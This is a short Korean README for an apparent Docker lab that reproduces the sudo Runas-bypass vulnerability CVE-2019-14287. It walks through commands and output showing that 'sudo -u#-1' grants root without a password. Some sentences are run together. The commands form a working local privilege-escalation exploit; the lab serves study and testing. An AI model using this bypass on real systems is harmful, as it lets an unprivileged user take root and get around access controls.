
Docker 기반 PoC로, Runas 사용자 제한 우회를 통한 CVE-2019-14287 sudo 권한 상승을 시연하며, 단계별 재현 지침을 포함합니다.
sudo 취약점(CVE-2019-14287)을 Docker 컨테이너에서 재현하는 샘플입니다.
docker compose up -d로 컨테이너를 시작합니다.docker exec -it vulnerable_sudo_app bash로 컨테이너에 들어갑니다.whoami 및 id 명령을 실행하여 자신이 일반 사용자(root가 아님)인지 확인합니다.
$ whoami
user1
$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1)
$ id -u
1000
sudo -u#0 whoami 및 sudo -u#0 id -u가 실행되지 않는지 확인합니다.
-u 옵션)에 0(root)을 지정하여 실행합니다.$ sudo -u#0 whoami
[sudo] password for user1:
$ sudo -u#0 id
[sudo] password for user1:
$ sudo -u#0 id -u
[sudo] password for user1:
sudo -u#-1 whoami 및 sudo -u#-1 id -u를 실행하여 인증 없이 root로 명령을 실행할 수 있는지 확인합니다(취약점 재현).
-u#4294967295로도 동일하게 할 수 있습니다.$ sudo -u#-1 whoami
root
$ sudo -u#-1 id
uid=0(root) gid=1000(user1) groups=1000(user1)
$ sudo -u#-1 id -u
0